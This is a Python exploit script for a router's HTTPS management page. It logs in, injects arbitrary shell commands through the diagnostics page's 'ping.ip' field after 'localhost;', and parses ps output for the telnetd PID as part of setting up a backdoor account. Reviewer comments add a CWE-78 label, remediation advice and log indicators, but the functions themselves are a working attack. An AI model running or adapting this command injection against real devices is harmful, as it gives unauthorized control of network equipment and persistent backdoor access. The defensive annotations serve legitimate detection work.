##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
# (used verbatim as the HTTPSConnection host in request() and inside the
# Referer header built by login(), logout() and execCmd())
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
# NOTE(review): not referenced by the functions visible in this part of the file.
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file: /tmp/teamf1.cfg.ascii
# Edit this file to make your changes persistent.
# NOTE(review): for incident response this looks like the on-device file to
# inspect for account entries an administrator did not provision -- inferred
# from the two lines above; confirm against the firmware.
#
##############################
# Session cookie that execCmd() sends in its Cookie header; empty at load time.
cookie = ""
# NOTE(review): presumably the telnetd PID later obtained from findPid(); it is
# not assigned anywhere in the visible code -- confirm.
pid = -2
# NOTE(review): presumably the backdoor account name; it is not assigned
# anywhere in the visible code -- confirm.
bduser = ""
def request(m = "", u = "", b = "", h = ""):
    """Send one HTTPS request to the device at ``ipaddr``; return (headers, body).

    m -- HTTP method; anything other than "GET" or "POST" trips the assert.
    u -- request path (and query string).
    b -- already-encoded request body.
    h -- dict of request headers.

    A new connection with a 15 second timeout is opened for every call and
    closed once the response has been read. If the request or the read
    raises, the connection is not closed here.

    NOTE(review): no SSL context is passed, so whether the device certificate
    is validated depends on the interpreter's httplib default (Python 2.7.9
    and later verify by default) -- confirm for the runtime in use.
    """
    connection = httplib.HTTPSConnection(ipaddr, timeout = 15)
    # The method check runs after the connection object is built, as before.
    assert m in ("GET", "POST")
    connection.request(method = m, url = u, body = b, headers = h)
    response = connection.getresponse()
    reply = (response.getheaders(), response.read())
    connection.close()
    return reply
def login(user, passwd):
    """POST the login form to /scgi-bin/platform.cgi; return request()'s result.

    user, passwd -- sent as the Users.UserName / Users.Password form fields.

    Returns the (headers, body) tuple from request(). This function does not
    read a session cookie out of the response; nothing here updates the
    module-level ``cookie``.

    For log review: both the User-Agent header and the Login.userAgent form
    field carry the literal string "Exploit".
    """
    target = "/scgi-bin/platform.cgi"
    request_headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                       'User-Agent': "Exploit",
                       'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
                       'Content-Type': "application/x-www-form-urlencoded"}
    form = {'thispage' : "index.htm",
            'Users.UserName' : user,
            'Users.Password' : passwd,
            'button.login.Users.deviceStatus' : "Login",
            'Login.userAgent' : "Exploit"}
    encoded_form = urllib.urlencode(form)
    return request("POST", target, encoded_form, request_headers)
def logout():
    """GET the index page of platform.cgi; return request()'s (headers, body).

    The request carries an empty body and the same fixed headers as login().
    No Cookie header is attached, so this code alone does not show that the
    device ends any session in response.
    """
    request_headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                       'User-Agent': "Exploit",
                       'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
                       'Content-Type': "application/x-www-form-urlencoded"}
    # urlencode is still applied to the empty string, exactly as before.
    empty_body = urllib.urlencode("")
    return request("GET", "/scgi-bin/platform.cgi?page=index.htm", empty_body, request_headers)
def execCmd(cmd = None):
    """Submit the systemCheck.htm traceroute form with ``cmd`` appended to ping.ip.

    cmd -- string placed after "localhost;" in the ping.ip field; must not be
           None (assert).

    Returns the (headers, body) tuple from request(). The module-level
    ``cookie`` is sent as the Cookie header.

    Security-relevant point: the script only works if the device hands the
    ping.ip value to a shell without validating it, i.e. OS command injection
    (CWE-78) in the diagnostics page. The remedy on the device side is to
    accept only an IP address or hostname in that field and to run the
    diagnostic without a shell; restricting who can reach the management
    interface limits exposure.

    For detection: a POST to /scgi-bin/platform.cgi with
    thispage=systemCheck.htm whose ping.ip value contains ";" (%3B once
    URL-encoded). The User-Agent "Exploit" is a literal of this script and
    should not be the only indicator relied on.
    """
    assert cmd != None
    request_headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                       'User-Agent': "Exploit",
                       'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
                       'Cookie': cookie,
                       'Content-Type': "application/x-www-form-urlencoded"}
    form = {'thispage' : "systemCheck.htm",
            'ping.ip' : "localhost;" + cmd,
            'button.traceroute.diagDisplay' : "Traceroute"}
    encoded_form = urllib.urlencode(form)
    return request("POST", "/scgi-bin/platform.cgi", encoded_form, request_headers)
def findPid(mystr = None):
    """Return the PID printed just before ``mystr`` in the device's ps output.

    mystr -- text to locate in the response body, e.g. the command-line part
             of a line such as
             " 957 root 2700 S /usr/sbin/telnetd -l /bin/login".
             Must not be None (assert).

    The ps listing is obtained through execCmd(), so it arrives embedded in
    the HTTP response body of the diagnostics page. Returns 0 when ``mystr``
    is not found at a positive offset. Otherwise the 50 characters before the
    match are examined: the first whitespace-separated field after the first
    newline is taken as the PID, falling back to the first field after the
    first ">" when there is no newline in that window. IndexError from the
    fallback and ValueError from int() are not handled and propagate.
    """
    assert mystr != None
    _, page = execCmd(cmd = "ps|grep telnetd|grep -v grep")
    offset = page.find(mystr)
    if offset <= 0:
        # Not found (or found at offset 0): report "no PID".
        return 0
    # telnetd is running; look at the text immediately preceding the match.
    window = page[offset - 50 : offset]
    try:
        pid_field = window.split("\n")[1].split()[0]
    except IndexError:
        pid_field = window.split(">")[1].split()[0]
    return int(pid_field)